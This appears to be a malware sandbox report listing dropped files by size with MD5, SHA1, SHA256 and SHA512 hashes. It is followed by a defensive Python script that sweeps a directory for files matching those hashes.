be8dbe2dc77ebe7f88f910c61aec691a
SHA1
a19f08bb2b1c1de5bb61daf9f2304531321e0e40
SHA256
4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83
SHA512
0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655
-
Filesize
48KB
MD5
341a6188f375c6702de4f9d0e1de8c08
SHA1
204a508ca6a13eb030ed7953595e9b79b9b9ba3b
SHA256
7039e1f1aef638c8dd8f8a4c55fd337219a4005dca2b557ba040171c27b02a1e
SHA512
5976f053ff865313e3b37b58ca053bc2778df03b8488bb0d47b0e08e1e7ba77ccf731b44335df0cea7428b976768bedc58540e68b54066a48fc4d8042e1d8a24
-
Filesize
58KB
MD5
ee2d4cd284d6bad4f207195bf5de727f
SHA1
781344a403bbffa0afb080942cd9459d9b05a348
SHA256
2b5fe7c399441ac2125f50106bc92a2d8f5e2668886c6de79452b82595fc4009
SHA512
a6b3ad33f1900132b2b8ff5b638cbe7725666761fc90d7f76fc835ecd31dfefc48d781b12b1e60779191888931bb167330492599c5fea8afa51e9c0f3d6e8e55
-
Filesize
106KB
MD5
918e513c376a52a1046c4d4aee87042d
SHA1
d54edc813f56c17700252f487ef978bde1e7f7e1
SHA256
f9570f5d214d13446ed47811c7674e1d77c955c60b9fc7247ebcb64a32ae6b29
SHA512
ac2990a644920f07e36e4cb7af81aab82a503e579ce02d5026931631388e2091a52c12e4417e8c747f2af9aa9526b441a3f842387b5be534633c2258beeed497
-
Filesize
35KB
MD5
6d2132108825afd85763fc3b8f612b11
SHA1
af64b9b28b505e4eab1b8dd36f0ecf5511cc78a0
SHA256
aba69b3e817bfb164ffc7549c24b68addb1c9b88a970cf87bec99d856049ee52
SHA512
196bcf97034f1767a521d60423cca9d46a6447156f12f3eac5d1060a7fa26ac120c74c3ef1513e8750090d37531d014a48dd17db27fbfbb9c4768aa3aca6d5c0
-
Filesize
86KB
MD5
5eee7d45b8d89c291965a153d86592ee
SHA1
93562dcdb10bd93433c7275d991681b299f45660
SHA256
7b5c5221d9db2e275671432f22e4dfca8fe8a07f6374fcfed15d9a3b2fdf07d9
SHA512
0d8f178ff5ef1e87aa4aae41089d063985c11544f85057e3860bcab1235f5ddb1cb582550a482c8b7eb961211fa67777e30b678294258ada27c423070ce8453e
-
Filesize
25KB
MD5
8b3ba5fb207d27eb3632486b936396a3
SHA1
5ad45b469041d88ec7fd277d84b1e2093ec7f93e
SHA256
9a1e7aaf48e313e55fc4817f1e7f0bfe0a985f30c024dcc8d28d67f8ff87a051
SHA512
18f5a0b1a384e328d07e59a5cefbc25e027adf24f336f5ec923e38064312ea259851167bc6bc0779e2d05cd39ddd8d16a2dfd15751c83ee58fda3b1187edc54b
-
Filesize
43KB
MD5
3ea95c5c76ea27ca44b7a55f6cfdcf53
SHA1
aace156795cfb6f418b6a68a254bb4adfc2afc56
SHA256
7367f5046980d3a76a6ddefc866b203cbaced9bb17f40ea834aed60bb5b65923
SHA512
916effbe6130a7b6298e1bd62e1e83e9d3defc6a7454b9044d953761b38808140a764ded97dcb1ab9d0fa7f05ae08c707da7af1c15f672a959ad84aa8da114c0
-
Filesize
56KB
MD5
c9d6ffa3798bb5ae9f1b082d66901350
SHA1
25724fecf4369447e77283ece810def499318086
SHA256
410dad8d8b4ccf6f22701a2cdcb1bb5fd10d8efa97a21b1f5c7e1b8afc9f4fec
SHA512
878b10771303cb885039348fc7549338ad2ce609f4df6fff6588b079ab9efb624d6bc31474e806ad2a97785b30877b8241286276f36aab9e50a92cbf11adc448
-
Filesize
65KB
MD5
936919f3509b2a913bf9e05723bc7cd2
SHA1
6bf9f1ecfcd71fc1634b2b70fcd567d220b1a6bd
SHA256
efce6dcf57915f23f10c75f6deaf6cb68efe87426caad4747ca908199b1f01e3
SHA512
2b2436e612b6cd60d794f843498fcbf8624a80e932d242592e569e32ec1d40a25d80e2c7e9f8edc7fc0478cef2ec6f77ad6c6ebbddf5afb027263397c91c73c3
-
Filesize
1.4MB
MD5
81cd6d012885629791a9e3d9320c444e
SHA1
53268184fdbddf8909c349ed3c6701abe8884c31
SHA256
a18892e4f2f2ec0dee5714429f73a5add4e355d10a7ba51593afc730f77c51dd
SHA512
d5bf47fad8b1f5c7dcaa6bef5d4553e461f46e6c334b33d8adc93689cf89365c318f03e961a5d33994730b72dc8bde62209baca015d0d2d08a081d82df7dfd73
-
Filesize
122KB
MD5
aa8030686d448b5a88f72b770c0f8c3a
SHA1
498f03e1dd788ff33cdd570eb00a85ee0e035bcd
SHA256
6a7c9ca577a6df02833911bea20dcec90e40f3dafaab330eff316cbfb4e24e8b
SHA512
f8eaf48d3919e85fd1eda64dc453c1fb1ea719a68e6b128ba19fe6ad74f123c7de8379a39d31cf67e25a45023716cd7e171933e0be1cd2a3a8d60f496f3e77af
-
Filesize
1.6MB
MD5
27515b5bb912701abb4dfad186b1da1f
SHA1
3fcc7e9c909b8d46a2566fb3b1405a1c1e54d411
SHA256
fe80bd2568f8628032921fe7107bd611257ff64c679c6386ef24ba25271b348a
SHA512
087dfdede2a2e6edb3131f4fde2c4df25161bee9578247ce5ec2bce03e17834898eb8d18d1c694e4a8c5554ad41392d957e750239d3684a51a19993d3f32613c
-
Filesize
29KB
MD5
08b000c3d990bc018fcb91a1e175e06e
SHA1
bd0ce09bb3414d11c91316113c2becfff0862d0d
SHA256
135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece
SHA512
8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf
-
Filesize
223KB
MD56eda5a055b164e5e798429dcd94f5b88
SHA12c5494379d1efe6b0a101801e09f10a7cb82dbe9
SHA256377da6175c8a3815d164561350ae1df22e024bc84c55ae5d2583b51dfd0a19a8
SHA51274283b4051751f9e4fd0f4b92ca4b953226c155fe4730d737d7ce41a563d6f212da770e96506d1713d8327d6fef94bae4528336ebcfb07e779de0e0f0cb31f2e
-
Filesize
1.6MB
MD576eb1ad615ba6600ce747bf1acde6679
SHA1d3e1318077217372653be3947635b93df68156a4
SHA25630be871735591ad96bc3fc7e541cdef474366159c2f7443feb30739cbd2db7e1
SHA5122b960e74dd73f61d6a44fef0de9f2d50bcf2ec856b7aa5b97f0107e3cdadea461790760668a67db2ecaf71ff323133ee39ce2b38aafff3629c14e736d6a64aeb
-
Filesize
615KB
MD59c223575ae5b9544bc3d69ac6364f75e
SHA18a1cb5ee02c742e937febc57609ac312247ba386
SHA25690341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213
SHA51257663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09
-
Filesize
456B
MD54531984cad7dacf24c086830068c4abe
SHA1fa7c8c46677af01a83cf652ef30ba39b2aae14c3
SHA25658209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211
SHA51200056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122
-
Filesize
25KB
MD52398a631bae547d1d33e91335e6d210b
SHA1f1f10f901da76323d68a4c9b57f5edfd3baf30f5
SHA256487fd8034efaf55106e9d04fc5d19fcd3e6449f45bc87a4f69189cd4ebb22435
SHA5126568982977b8adb6ee04b777a976a2ecc3e4db1dffbd20004003a204eb5dae5980231c76c756d59a5309c2b1456cb63ab7671705a2c2e454c667642beb018c21
-
Filesize
630KB
MD5cc9d1869f9305b5a695fc5e76bd57b72
SHA1c6a28791035e7e10cfae0ab51e9a5a8328ea55c1
SHA25631cb4332ed49ce9b31500725bc667c427a5f5a2a304595beca14902ba7b7eeee
SHA512e6c96c7c7665711608a1ba6563b7b4adb71d0bf23326716e34979166de65bc2d93cb85d0cb76475d55fd042da97df978f1423c099ad5fbeeaef8c3d5e0eb7be1
-
Filesize
295KB
MD56279c26d085d1b2efd53e9c3e74d0285
SHA1bd0d274fb9502406b6b9a5756760b78919fa2518
SHA256411bfb954b38ec4282d10cecb5115e29bffb0b0204ffe471a4b80777144b00f6
SHA51230fdeed6380641fbb4d951d290a562c76dd44b59194e86f550a4a819f46a0deb7c7a2d94867cc367c41dcab9efb95628d65fe9a039c0e14a679c149148d82ac9
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD53ce93bae2b317f02fea9067474f322b2
SHA12c9db780d8093bb75b577a0d4d0d360353579058
SHA256b461f6baa5f9c06c284fa80e1be75130a07efe8f0d6e530abe81da6fb38e39be
SHA512041bac05ac17e63b12b2951174982abf6b77b8ec64cd8cfeff77487ad77fc630efc0c96efc8aa9959960e660a3e0dd73c3bb94c011e65ea011903d9f14d8d0ec
-
Filesize
530B
MD547f76b064d5686a717db7f2daf6b462e
SHA1e58056959320a4a9ea95d1cd6d56684ad5536ff7
SHA2560652a07eefb66b4532d6e937d186d2ccb07db77cbd1539b729306ea4662c3eaa
SHA512f631ec20826ca56f8fdce209bf40deb786ba7fe027f32a9ecc01477d783db3e211b38b79564734d57fd3a364bc541ab0fa134e4feccbd92ce3c76de74ce25fcf
-
Filesize
608B
MD59afd755aaf71fb244aa2bf2181422dcd
SHA1c5c08feff2bf4aa1858a24b90314ad5afd476114
SHA2561af6e8eda59abe6f4c4bb6fcb6cc0583f8037caba39d92d5788c179b648af05f
SHA512bc2d9c8e095f8fd9eadd5c42f56ec14e1cdfc764c511fb28c0aea8c3320c71446ca56d866a09c7dce4504706100331a4a659468f35dfcc02e327a98eb2dcfb49
-
Filesize
855B
MD5aac1fb5b14593bdfb12858ed579db4f0
SHA143d48ec7eb0351ed823f47fd8224a00c345c6190
SHA25636b95c52baef48e6388e17508d1a374b95c894d48b897b2b865a0371d9043a0b
SHA51251d7af8f30d094657b19765cee1f63b52ef5105ab9b54ba74ed52211e2d66b0a47657f6837fcf4e5d6962d1283fe39341ee5fb940e7f8df80a025195a96c8db4
-
Filesize
810B
MD5ba465c66e857ceb29aa1d864c8701178
SHA1e35c4c575c85ced705ad16e7a4b4bc200eba3be9
SHA25620ae35ae6f3b6066a7b76546e0e2a721b7450146446c660efd0ea8e176b84c3e
SHA512e74ebbb14effb29482ed8d54ff7303a2d0db5a770620bc061070086cf8b7ac7a2e6b9ceee8da7a442034befe0f71fe4ae2377a432698d144c3154d082c377546
-
Filesize
583B
MD572ab7c99ecd2e90ebbaa11cbef60449c
SHA19934079ce8236b765e174de2dd0f01438c5348ae
SHA256407ff70da7a1b1c86f91a3032b6cf613daaf6dca8824ce87a814f66a6c45a989
SHA512e908e572ce519afd2a30480ed52bc25bb664bc24aaab26c3962d5bcacde10352b4911c248a22e361a22f9ef78958e8e249783be8f1a2cc4aa4bbf82379c3d244
-
Filesize
30B
MD5e140e10b2b43ba6f978bee0aa90afaf7
SHA1bbbeb7097ffa9c2daa3206b3f212d3614749c620
SHA256c3a706e5567ca4eb3e18543296fa17e511c7bb6bef51e63bf9344a59bf67e618
SHA512df5b92757bf9200d0945afda94204b358b9f78c84fbaeb15bdf80eae953a7228f1c19fdf53ed54669562b8f0137623ea6cee38f38ef23a6f06de1673ff05733f
-
Filesize
389KB
MD5e7c53515b9bc4aba7d3e9a506093b275
SHA12a2faa43595922abd452ff303b2fd70f4d0f3737
SHA256472acf99369eefb8b89584d00c2f0aef162746785824d9b311e069facb48b182
SHA512234a4f71013b384d091ca4ff0645732c201fdd34495f10bd493b1e8051e0d75b8dd9449c28c4e8ed3a7618204d152818a261ca032125b4b992d69a09d2a91557
-
Filesize
232B
MD5b197e319a2b2ee2bf40f2d2b847ef931
SHA1c350e85706b6e404e186f03d985dd4ea1cfa341b
SHA2569f858c1d34d9c93c6d55cb34ebbe6403ce18563b4c9a4659c37878f7bff9685d
SHA512e02498486e8bdab5ef626cf6f643b29cd8928e7fffaa325cacb7e1cd14a9a777751556782d1a8d239ce1ea6516e13e261c4917ab982c545066a93dbf28e2969a
-
Filesize
2KB
MD5ccf31995e8c2c3bf378b858816ba91e7
SHA1e6d8321a903761e7e8bdaf3674cb284f238c6697
SHA256aa1cec4b0d9c5379b002c03ecb4d99e535feb656d5e6d95d2d03358a06f97e35
SHA5127ebfa41781637dbe0a3e0c053c8be15c0f3d9d48cb430eec16bf976a58263ac7806e9134b1bd8eed67a61dc50fdc2cf894fc56bf9dd88acda7d24b5679a6b3a6
-
Filesize
12KB
MD57a839443fe72160e7b5b2b9ec4b5f8c4
SHA1e41c194a07d1fa43853ad002a98ca0a0c9afdc56
SHA25644b7a322ff3d5b52e842395b9e3f8c2ad73166d00361e67c2a3b81f134b7b623
SHA512e43f5110634837b8fb6223016ca1fc603abfcf82db5f28f51b5b3660b71b15253c8d011dcfea11f92382e32bfa007c91f7097393ccc190d78f5cedb09e979c9a
-
Filesize
2KB
MD5f99e42cdd8b2f9f1a3c062fe9cf6e131
SHA1e32bdcab8da0e3cdafb6e3876763cee002ab7307
SHA256a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0
SHA512c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6
-
Filesize
652B
MD50a7051f544c3ffde73c1ed0ab357be32
SHA1caff3f010332347dc9bf93b97353e62528fddf56
SHA256ee18153b8da31f8b11aefbcd520bb14351f5144f361914405d88bcfea6e7032a
SHA512b1996462c89001a41eeb60fde70f7650f8ca6ee3bdad285c0400bf75238454ff534c5d0d9cd3d7be5b7b4808d961f9e0a187f32e79b20e3a0660e58627822475
-
Filesize
1004B
MD5c76055a0388b713a1eabe16130684dc3
SHA1ee11e84cf41d8a43340f7102e17660072906c402
SHA2568a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7
SHA51222d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2
-
Filesize
607B
MD5ef5af4133522b458cf7f31957fc2098c
SHA1c75f88e0328f78400e8dacd88a4a9775a17301d0
SHA256d14c19f416ce97a215fec10158853dfac6432c242351a5adf7384fcf9a242653
SHA51298ccdb834caec76cc1b8943fd8e2814f44b332b487b02c4c81ac96c8c3c76594163032485e291c1faeb0e9061f287346da69663fa4b77e7b58c79cbc5a8a9fdf
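The list above is only useful if an analyst can sweep a suspect host (for example an acquired copy of the user's %TEMP% tree) against it. The script below is an added example, not part of the sandbox report: it streams each file through MD5, SHA1, SHA256 and SHA512 in one pass, compares the result with a small constructed subset of the dropped-file records copied from this page (REPORT_IOCS; extend it with the rest of the entries as needed), and ranks a SHA256 hit as strong while an MD5- or SHA1-only hit is reported as weak, because both of those algorithms are collision-prone. The human_size helper approximates the report's size column under an assumed convention (whole bytes, whole KB, one-decimal MB); the report does not document its rounding.

```python
import hashlib
import os
import sys
from typing import Dict, Iterator, List, Optional, Tuple

# Constructed subset of the dropped-file records listed in the report above.
# Hash values are copied from the page; the "size" strings are the report's own.
REPORT_IOCS: List[Dict[str, str]] = [
    {"size": "56KB",
     "md5": "c9d6ffa3798bb5ae9f1b082d66901350",
     "sha1": "25724fecf4369447e77283ece810def499318086",
     "sha256": "410dad8d8b4ccf6f22701a2cdcb1bb5fd10d8efa97a21b1f5c7e1b8afc9f4fec"},
    {"size": "456B",
     "md5": "4531984cad7dacf24c086830068c4abe",
     "sha1": "fa7c8c46677af01a83cf652ef30ba39b2aae14c3",
     "sha256": "58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211"},
    {"size": "60B",
     "md5": "d17fe0a3f47be24a6453e9ef58c94641",
     "sha1": "6ab83620379fc69f80c0242105ddffd7d98d5d9d",
     "sha256": "96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7"},
]

# The four digests the report publishes for every dropped file.
ALGOS = ("md5", "sha1", "sha256", "sha512")


def digest_bytes(data: bytes) -> Dict[str, str]:
    """Return all four digests of an in-memory buffer, keyed by algorithm name."""
    return {name: hashlib.new(name, data).hexdigest() for name in ALGOS}


def digest_file(path: str, chunk_size: int = 1 << 20) -> Dict[str, str]:
    """Stream a file through all four hashers at once so large drops are read only once."""
    hashers = {name: hashlib.new(name) for name in ALGOS}
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            for h in hashers.values():
                h.update(chunk)
    return {name: h.hexdigest() for name, h in hashers.items()}


def human_size(n: int) -> str:
    """Approximate the report's size column. Assumed convention: B below 1 KiB,
    whole KB below 1 MiB, one-decimal MB above; the report does not state its rounding."""
    if n < 1024:
        return f"{n}B"
    if n < 1024 ** 2:
        return f"{round(n / 1024)}KB"
    return f"{n / 1024 ** 2:.1f}MB"


def match_iocs(digests: Dict[str, str],
               iocs: List[Dict[str, str]] = REPORT_IOCS) -> Optional[Tuple[str, Dict[str, str]]]:
    """Return ("strong", record) on a SHA256 hit, ("weak", record) on an MD5/SHA1-only hit,
    or None. MD5 and SHA1 are collision-prone, so a weak hit is a lead to confirm, not a verdict."""
    for rec in iocs:
        if digests["sha256"] == rec["sha256"]:
            return ("strong", rec)
    for rec in iocs:
        if digests["md5"] == rec["md5"] or digests["sha1"] == rec["sha1"]:
            return ("weak", rec)
    return None


def scan_tree(root: str,
              iocs: List[Dict[str, str]] = REPORT_IOCS) -> Iterator[Tuple[str, str, Dict[str, str]]]:
    """Walk a directory tree and yield (path, strength, record) for every file that matches."""
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                hit = match_iocs(digest_file(path), iocs)
            except OSError:
                continue  # unreadable or vanished file: skip it rather than abort the sweep
            if hit:
                yield path, hit[0], hit[1]


if __name__ == "__main__":
    # Usage: python sweep.py <directory>  (defaults to the current directory)
    for path, strength, rec in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{strength:6} {rec['size']:>6} {rec['sha256']} {path}")
```

Hashing all four algorithms in a single read matters on large acquisitions; the per-file cost is dominated by I/O, not by the extra hashers. Keep the SHA256 (or SHA512) values as the authoritative indicators when exchanging this list with other teams, and treat MD5/SHA1 as convenience fields for matching against older reports.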